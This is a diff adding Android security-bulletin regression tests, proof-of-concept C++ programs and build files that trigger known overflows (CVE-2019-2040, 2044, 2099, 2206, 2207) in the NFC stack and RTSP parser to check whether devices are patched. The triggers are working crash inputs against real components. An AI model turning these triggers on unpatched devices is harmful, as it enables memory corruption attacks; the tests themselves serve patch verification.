+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdlib.h>
+#include <rw_int.h>
+#include <nfc_int.h>
+
+extern tRW_CB rw_cb;
+extern tNFC_CB nfc_cb;
+void rw_init(void);
+tNFC_STATUS rw_i93_select(uint8_t* p_uid);
+
+// borrowed from rw_i93.cc
+enum {
+ RW_I93_STATE_NOT_ACTIVATED, /* ISO15693 is not activated */
+ RW_I93_STATE_IDLE, /* waiting for upper layer API */
+ RW_I93_STATE_BUSY, /* waiting for response from tag */
+
+ RW_I93_STATE_DETECT_NDEF, /* performing NDEF detection precedure */
+ RW_I93_STATE_READ_NDEF, /* performing read NDEF procedure */
+ RW_I93_STATE_UPDATE_NDEF, /* performing update NDEF procedure */
+ RW_I93_STATE_FORMAT, /* performing format procedure */
+ RW_I93_STATE_SET_READ_ONLY, /* performing set read-only procedure */
+
+ RW_I93_STATE_PRESENCE_CHECK /* checking presence of tag */
+};
+
+// borrowed from rw_i93.cc
+enum {
+ RW_I93_SUBSTATE_WAIT_UID, /* waiting for response of inventory */
+ RW_I93_SUBSTATE_WAIT_SYS_INFO, /* waiting for response of get sys info */
+ RW_I93_SUBSTATE_WAIT_CC, /* waiting for reading CC */
+ RW_I93_SUBSTATE_SEARCH_NDEF_TLV, /* searching NDEF TLV */
+ RW_I93_SUBSTATE_CHECK_LOCK_STATUS, /* check if any NDEF TLV is locked */
+
+ RW_I93_SUBSTATE_RESET_LEN, /* set length to 0 to update NDEF TLV */
+ RW_I93_SUBSTATE_WRITE_NDEF, /* writing NDEF and Terminator TLV */
+ RW_I93_SUBSTATE_UPDATE_LEN, /* set length into NDEF TLV */
+
+ RW_I93_SUBSTATE_WAIT_RESET_DSFID_AFI, /* reset DSFID and AFI */
+ RW_I93_SUBSTATE_CHECK_READ_ONLY, /* check if any block is locked */
+ RW_I93_SUBSTATE_WRITE_CC_NDEF_TLV, /* write CC and empty NDEF/Terminator TLV
+ */
+
+ RW_I93_SUBSTATE_WAIT_UPDATE_CC, /* updating CC as read-only */
+ RW_I93_SUBSTATE_LOCK_NDEF_TLV, /* lock blocks of NDEF TLV */
+ RW_I93_SUBSTATE_WAIT_LOCK_CC /* lock block of CC */
+};
+
+void GKI_freebuf(void*) {
+}
+
+void GKI_start_timer(uint8_t, int32_t, bool) {
+}
+
+void GKI_stop_timer(uint8_t) {
+}
+
+int main() {
+ tRW_I93_CB* p_i93 = &rw_cb.tcb.i93;
+
+ GKI_init();
+ rw_init();
+
+ uint8_t p_uid = 1;
+ if (rw_i93_select(&p_uid) != NFC_STATUS_OK) {
+ return EXIT_FAILURE;
+ }
+
+ tNFC_CONN_CB* p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
+ tNFC_CONN_EVT event = NFC_DATA_CEVT;
+
+ tNFC_CONN *p_data = (tNFC_CONN *) malloc(sizeof(tNFC_CONN));
+ if (!p_data) {
+ return EXIT_FAILURE;
+ }
+
+ p_data->data.p_data = (NFC_HDR *) malloc(sizeof(uint8_t) * 32);
+ if (!(p_data->data.p_data)) {
+ free(p_data);
+ return EXIT_FAILURE;
+ }
+
+ NFC_HDR *p_resp = (NFC_HDR*) p_data->data.p_data;
+ p_resp->len = 0;
+ p_resp->offset = 0;
+
+ p_i93->state = RW_I93_STATE_UPDATE_NDEF;
+ p_i93->sub_state = RW_I93_SUBSTATE_RESET_LEN;
+ p_i93->block_size = 2 * (I93_MAX_BLOCK_LENGH + 1);
+ p_i93->ndef_tlv_start_offset = 2 * (I93_MAX_BLOCK_LENGH) - 1;
+ p_data->status = NFC_STATUS_OK;
+
+ p_cb->p_cback(0, event, p_data);
+ free(p_data->data.p_data);
+ free(p_data);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2040/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2040/Android.bp
new file mode 100644
index 0000000..942d552
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2040/Android.bp
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2019-2040",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/include",
+ "system/nfc/src/gki/common",
+ "system/nfc/src/nfc/include",
+ "system/nfc/src/gki/ulinux/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2040/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2040/poc.cpp
new file mode 100644
index 0000000..384c085
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2040/poc.cpp
@@ -0,0 +1,112 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <nfc_api.h>
+#include <nfc_int.h>
+#include <rw_int.h>
+
+constexpr int kLength = 8;
+
+extern tRW_CB rw_cb;
+extern tNFC_CB nfc_cb;
+void rw_init(void);
+
+tNFC_STATUS rw_i93_select(uint8_t *p_uid);
+
+void GKI_start_timer(uint8_t, int32_t, bool) {}
+
+void GKI_stop_timer(uint8_t) {}
+
+// borrowed from rw_i93.cc
+enum {
+ RW_I93_STATE_NOT_ACTIVATED, /* ISO15693 is not activated */
+ RW_I93_STATE_IDLE, /* waiting for upper layer API */
+ RW_I93_STATE_BUSY, /* waiting for response from tag */
+
+ RW_I93_STATE_DETECT_NDEF, /* performing NDEF detection precedure */
+ RW_I93_STATE_READ_NDEF, /* performing read NDEF procedure */
+ RW_I93_STATE_UPDATE_NDEF, /* performing update NDEF procedure */
+ RW_I93_STATE_FORMAT, /* performing format procedure */
+ RW_I93_STATE_SET_READ_ONLY, /* performing set read-only procedure */
+
+ RW_I93_STATE_PRESENCE_CHECK /* checking presence of tag */
+};
+
+// borrowed from rw_i93.cc
+enum {
+ RW_I93_SUBSTATE_WAIT_UID, /* waiting for response of inventory */
+ RW_I93_SUBSTATE_WAIT_SYS_INFO, /* waiting for response of get sys info */
+ RW_I93_SUBSTATE_WAIT_CC, /* waiting for reading CC */
+ RW_I93_SUBSTATE_SEARCH_NDEF_TLV, /* searching NDEF TLV */
+ RW_I93_SUBSTATE_CHECK_LOCK_STATUS, /* check if any NDEF TLV is locked */
+
+ RW_I93_SUBSTATE_RESET_LEN, /* set length to 0 to update NDEF TLV */
+ RW_I93_SUBSTATE_WRITE_NDEF, /* writing NDEF and Terminator TLV */
+ RW_I93_SUBSTATE_UPDATE_LEN, /* set length into NDEF TLV */
+
+ RW_I93_SUBSTATE_WAIT_RESET_DSFID_AFI, /* reset DSFID and AFI */
+ RW_I93_SUBSTATE_CHECK_READ_ONLY, /* check if any block is locked */
+ RW_I93_SUBSTATE_WRITE_CC_NDEF_TLV, /* write CC and empty NDEF/Terminator TLV
+ */
+
+ RW_I93_SUBSTATE_WAIT_UPDATE_CC, /* updating CC as read-only */
+ RW_I93_SUBSTATE_LOCK_NDEF_TLV, /* lock blocks of NDEF TLV */
+ RW_I93_SUBSTATE_WAIT_LOCK_CC /* lock block of CC */
+};
+
+void GKI_freebuf(void *p_buf __attribute__((unused))) {}
+
+int main() {
+ tRW_I93_CB *p_i93 = &rw_cb.tcb.i93;
+
+ GKI_init();
+ rw_init();
+
+ uint8_t p_uid = 1;
+ if (rw_i93_select(&p_uid) != NFC_STATUS_OK) {
+ return EXIT_FAILURE;
+ }
+
+ tNFC_CONN_CB *p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
+ tNFC_CONN_EVT event = NFC_DATA_CEVT;
+
+ tNFC_CONN *p_data = (tNFC_CONN *)malloc(sizeof(tNFC_CONN));
+ if (!p_data) {
+ return EXIT_FAILURE;
+ }
+
+ p_data->data.p_data = (NFC_HDR *)malloc(sizeof(uint8_t) * 16);
+ if (!(p_data->data.p_data)) {
+ free(p_data);
+ return EXIT_FAILURE;
+ }
+
+ p_i93->state = RW_I93_STATE_BUSY;
+ p_i93->sub_state = RW_I93_SUBSTATE_CHECK_READ_ONLY;
+ p_i93->block_size = I93_MAX_BLOCK_LENGH - 1;
+ p_i93->sent_cmd = I93_CMD_EXT_GET_SYS_INFO;
+ p_data->status = NFC_STATUS_OK;
+
+ NFC_HDR *p_resp = (NFC_HDR *)p_data->data.p_data;
+ p_resp->len = kLength;
+ p_resp->offset = 0;
+
+ p_cb->p_cback(0, event, p_data);
+ free(p_data->data.p_data);
+ free(p_data);
+
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2044/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2044/Android.bp
new file mode 100644
index 0000000..f516e6a
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2044/Android.bp
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2019-2044",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ ],
+ compile_multilib: "32",
+ include_dirs: [
+ "frameworks/av/media/libstagefright/rtsp/",
+ ],
+ shared_libs: [
+ "libmediaplayerservice",
+ "libstagefright_foundation",
+ "libutils",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2044/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2044/poc.cpp
new file mode 100644
index 0000000..e733c6f
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2044/poc.cpp
@@ -0,0 +1,42 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#include <stdlib.h>
+#include <APacketSource.h>
+#include <ASessionDescription.h>
+
+using namespace android;
+
+int main(void) {
+ sp<ASessionDescription> desc = new ASessionDescription;
+ static const char *raw =
+ "m=mFormats 20\r\n"
+ "a=rtpmap:20 MP4V-ES/1/2\r\n"
+ "a=fmtp:20 config=0000012000004000280020008061616161616161616161616161"
+ "61616161616161616161616161616161616161616161616161616161616161616161"
+ "61616161616161616161616161616161616161616161616161616161616161616161"
+ "616161616161616161616161616161616161616161616161616161\r\n"
+ "a=range:npt=1.1-2.2\r\n"
+ "a=framesize:1-9 \r\n"
+ "a=control:abc\r\n"
+ "a=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\n";
+
+ if(!desc->setTo(raw, strlen(raw))) {
+ return EXIT_FAILURE;
+ }
+
+ sp<APacketSource> source = new APacketSource(desc, 1);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2099/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2099/Android.bp
new file mode 100644
index 0000000..85304bc
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2099/Android.bp
@@ -0,0 +1,34 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+cc_test {
+ name: "CVE-2019-2099",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/common/",
+ "system/nfc/src/gki/ulinux/",
+ "system/nfc/src/nfa/include/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2099/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2099/poc.cpp
new file mode 100644
index 0000000..8cfa619
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2099/poc.cpp
@@ -0,0 +1,122 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <dlfcn.h>
+#include <nfa_rw_int.h>
+#include <nfc_int.h>
+#include <rw_int.h>
+#include <stdlib.h>
+#include "../includes/common.h"
+
+#define LENGTH 0xBEB
+
+extern tRW_CB rw_cb;
+extern tNFC_CB nfc_cb;
+void rw_init(void);
+void NFA_Init(tHAL_NFC_ENTRY *p_hal_entry_tbl);
+bool nfa_rw_activate_ntf(tNFA_RW_MSG *p_data);
+
+bool isInitialized = false;
+
+static void *(*real_memcpy)(void *to, const void *from, size_t numBytes) = nullptr;
+
+void init(void) {
+ real_memcpy = (void *(*)(void *, const void *, size_t))dlsym(RTLD_NEXT, "memcpy");
+ if (real_memcpy == nullptr) {
+ return;
+ }
+ isInitialized = true;
+}
+
+void *memcpy(void *to, const void *from, size_t numBytes) {
+ if (!isInitialized) {
+ init();
+ }
+ if (numBytes == LENGTH) {
+ exit(EXIT_VULNERABLE);
+ }
+ return real_memcpy(to, from, numBytes);
+}
+
+int freeResourcesAndReturn(int status, tNFA_RW_MSG *ptr1 = nullptr,
+ tNFC_ACTIVATE_DEVT *ptr2 = nullptr, tRW_DATA *ptr3 = nullptr,
+ NFC_HDR *ptr4 = nullptr, uint8_t *ptr5 = nullptr) {
+ if (ptr1) {
+ if (ptr2) {
+ free(ptr2);
+ }
+ free(ptr1);
+ }
+ if (ptr3) {
+ if (ptr4) {
+ free(ptr4);
+ }
+ free(ptr3);
+ }
+ if (ptr5) {
+ free(ptr5);
+ }
+ return status;
+}
+
+int main() {
+ GKI_init();
+ rw_init();
+ tHAL_NFC_ENTRY p_hal_entry_tbl;
+ NFA_Init(&p_hal_entry_tbl);
+
+ tNFA_RW_MSG *p_data = (tNFA_RW_MSG *)malloc(sizeof(tNFA_RW_MSG));
+ if (!p_data) {
+ return EXIT_FAILURE;
+ }
+ p_data->activate_ntf.p_activate_params =
+ (tNFC_ACTIVATE_DEVT *)malloc(sizeof(tNFC_ACTIVATE_DEVT));
+ if (!(p_data->activate_ntf.p_activate_params)) {
+ return freeResourcesAndReturn(EXIT_FAILURE, p_data);
+ }
+
+ tNFC_ACTIVATE_DEVT *p_activate_params = p_data->activate_ntf.p_activate_params;
+ p_activate_params->protocol = NFC_PROTOCOL_T2T;
+
+ nfa_rw_activate_ntf(p_data);
+
+ tRW_CBACK *p_cback = rw_cb.p_cback;
+ tRW_DATA *p_rw_data = (tRW_DATA *)malloc(sizeof(tRW_DATA));
+ if (!p_rw_data) {
+ return freeResourcesAndReturn(EXIT_FAILURE, p_data, p_data->activate_ntf.p_activate_params);
+ }
+
+ nfa_rw_cb.cur_op = NFA_RW_OP_READ_NDEF;
+ p_rw_data->data.p_data = (NFC_HDR *)malloc(sizeof(NFC_HDR));
+ if (!(p_rw_data->data.p_data)) {
+ return freeResourcesAndReturn(EXIT_FAILURE, p_data, p_data->activate_ntf.p_activate_params,
+ p_rw_data);
+ }
+
+ nfa_rw_cb.p_ndef_buf = (uint8_t *)malloc(sizeof(uint8_t));
+ if (!(nfa_rw_cb.p_ndef_buf)) {
+ return freeResourcesAndReturn(EXIT_FAILURE, p_data, p_data->activate_ntf.p_activate_params,
+ p_rw_data, p_rw_data->data.p_data);
+ }
+
+ p_rw_data->data.p_data->len = LENGTH;
+ if (p_cback) {
+ p_cback(RW_T3T_CHECK_EVT, p_rw_data);
+ }
+
+ return freeResourcesAndReturn(EXIT_SUCCESS, p_data, p_data->activate_ntf.p_activate_params,
+ p_rw_data, p_rw_data->data.p_data, nfa_rw_cb.p_ndef_buf);
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2133/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2133/Android.bp
index a7eef92..eb42b96 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2133/Android.bp
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2133/Android.bp
@@ -22,9 +22,6 @@
"poc.cpp",
],
multilib: {
- lib32: {
- suffix: "32",
- },
lib64: {
include_dirs: [
"packages/apps/Nfc/nci/jni/extns/pn54x/src/mifare/",
@@ -39,7 +36,6 @@
shared_libs: [
"libnfc_nci_jni",
],
- suffix: "64",
},
},
}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2134/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2134/Android.bp
index 3bbda28..c8353fe 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2134/Android.bp
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2134/Android.bp
@@ -22,9 +22,6 @@
"poc.cpp",
],
multilib: {
- lib32: {
- suffix: "32",
- },
lib64: {
include_dirs: [
"packages/apps/Nfc/nci/jni/extns/pn54x/src/mifare/",
@@ -39,7 +36,6 @@
shared_libs: [
"libnfc_nci_jni",
],
- suffix: "64",
},
},
}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2206/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2206/Android.bp
new file mode 100644
index 0000000..55a41e3
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2206/Android.bp
@@ -0,0 +1,42 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2019-2206",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/common/",
+ "system/nfc/src/gki/ulinux/",
+ "system/nfc/src/nfa/include/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ "libchrome",
+ "libbase",
+ "liblog",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ ]
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2206/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2206/poc.cpp
new file mode 100644
index 0000000..f40a7f2
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2206/poc.cpp
@@ -0,0 +1,123 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <nfc_api.h>
+#include <nfc_int.h>
+#include <rw_int.h>
+#include <stdlib.h>
+#include <tags_defs.h>
+
+#define RWLENGTH 32
+#define PLENGTH 1
+#define OFFSET 7
+
+// borrowed from rw_i93.cc
+extern tRW_CB rw_cb;
+extern tNFC_CB nfc_cb;
+void rw_init(void);
+tNFC_STATUS rw_i93_select(uint8_t *p_uid);
+
+// borrowed from rw_i93.cc
+enum {
+ RW_I93_STATE_NOT_ACTIVATED, /* ISO15693 is not activated */
+ RW_I93_STATE_IDLE, /* waiting for upper layer API */
+ RW_I93_STATE_BUSY, /* waiting for response from tag */
+
+ RW_I93_STATE_DETECT_NDEF, /* performing NDEF detection precedure */
+ RW_I93_STATE_READ_NDEF, /* performing read NDEF procedure */
+ RW_I93_STATE_UPDATE_NDEF, /* performing update NDEF procedure */
+ RW_I93_STATE_FORMAT, /* performing format procedure */
+ RW_I93_STATE_SET_READ_ONLY, /* performing set read-only procedure */
+
+ RW_I93_STATE_PRESENCE_CHECK /* checking presence of tag */
+};
+
+// borrowed from rw_i93.cc
+enum {
+ RW_I93_SUBSTATE_WAIT_UID, /* waiting for response of inventory */
+ RW_I93_SUBSTATE_WAIT_SYS_INFO, /* waiting for response of get sys info */
+ RW_I93_SUBSTATE_WAIT_CC, /* waiting for reading CC */
+ RW_I93_SUBSTATE_SEARCH_NDEF_TLV, /* searching NDEF TLV */
+ RW_I93_SUBSTATE_CHECK_LOCK_STATUS, /* check if any NDEF TLV is locked */
+
+ RW_I93_SUBSTATE_RESET_LEN, /* set length to 0 to update NDEF TLV */
+ RW_I93_SUBSTATE_WRITE_NDEF, /* writing NDEF and Terminator TLV */
+ RW_I93_SUBSTATE_UPDATE_LEN, /* set length into NDEF TLV */
+
+ RW_I93_SUBSTATE_WAIT_RESET_DSFID_AFI, /* reset DSFID and AFI */
+ RW_I93_SUBSTATE_CHECK_READ_ONLY, /* check if any block is locked */
+ RW_I93_SUBSTATE_WRITE_CC_NDEF_TLV, /* write CC and empty NDEF/Terminator TLV
+ */
+
+ RW_I93_SUBSTATE_WAIT_UPDATE_CC, /* updating CC as read-only */
+ RW_I93_SUBSTATE_LOCK_NDEF_TLV, /* lock blocks of NDEF TLV */
+ RW_I93_SUBSTATE_WAIT_LOCK_CC /* lock block of CC */
+};
+
+void GKI_freebuf(void *p_buf __attribute__((unused))) {}
+
+void GKI_start_timer(uint8_t, int32_t, bool) {}
+
+void GKI_stop_timer(uint8_t) {}
+
+int main() {
+ tRW_I93_CB *p_i93 = &rw_cb.tcb.i93;
+
+ GKI_init();
+ rw_init();
+
+ uint8_t p_uid = 1;
+ if (rw_i93_select(&p_uid) != NFC_STATUS_OK) {
+ return EXIT_FAILURE;
+ }
+
+ tNFC_CONN_CB *p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
+ tNFC_CONN_EVT event = NFC_DATA_CEVT;
+
+ tNFC_CONN *p_data = (tNFC_CONN *)malloc(sizeof(tNFC_CONN));
+
+ if (!p_data) {
+ return EXIT_FAILURE;
+ }
+
+ p_data->data.p_data =
+ (NFC_HDR *)malloc(sizeof(uint8_t) * (OFFSET + PLENGTH) * 2);
+
+ if (!(p_data->data.p_data)) {
+ free(p_data);
+ return EXIT_FAILURE;
+ }
+
+ p_i93->state = RW_I93_STATE_SET_READ_ONLY;
+ p_i93->sub_state = RW_I93_SUBSTATE_WAIT_CC;
+ p_i93->block_size = 1;
+
+ p_i93->ndef_tlv_start_offset = 0;
+ p_i93->rw_length = RWLENGTH;
+ p_i93->ndef_length = p_i93->rw_length * 2;
+
+ p_data->status = NFC_STATUS_OK;
+ NFC_HDR *p_resp = (NFC_HDR *)p_data->data.p_data;
+ p_resp->len = PLENGTH;
+ p_resp->offset = OFFSET;
+
+ p_cb->p_cback(0, event, p_data);
+
+ free(p_data->data.p_data);
+ free(p_data);
+
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2207/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2207/Android.bp
new file mode 100644
index 0000000..1147564
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2207/Android.bp
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2019-2207",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/common/",
+ "system/nfc/src/gki/ulinux/",
+ "system/nfc/src/nfa/include/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2207/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2207/poc.cpp
new file mode 100644
index 0000000..f94ee94
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2207/poc.cpp
@@ -0,0 +1,36 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdlib.h>
+#include "nfa_hci_defs.h"
+#include "nfa_hci_int.h"
+#define SIZE 16
+
+extern tNFA_HCI_CB nfa_hci_cb;
+
+int main() {
+ nfa_hci_cb.cmd_sent = NFA_HCI_ANY_GET_PARAMETER;
+ nfa_hci_cb.param_in_use = NFA_HCI_HOST_LIST_INDEX;
+ uint8_t data_len = SIZE * 6;
+ uint8_t *data = (uint8_t *)malloc(SIZE);
+ if (!data) {
+ return EXIT_FAILURE;
+ }
+ nfa_hci_handle_admin_gate_rsp(data, data_len);
+ free(data);
+
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-9362/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-9362/poc.cpp
index f388f89..720a76d 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2019-9362/poc.cpp
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-9362/poc.cpp
@@ -20,135 +20,60 @@
#define MAX_PARAMETER_SETS (9)
#define MAX_NUM_OTT (5)
-
-#define RETURN_EXIT_FAILURE_IF_NULL(ptr) \
- { \
- if (!ptr) { \
- return freeAllocatedMemoryAndReturn(frame, decoder, EXIT_FAILURE); \
- } \
- }
+#define ARR_SIZE (16)
typedef signed char SCHAR;
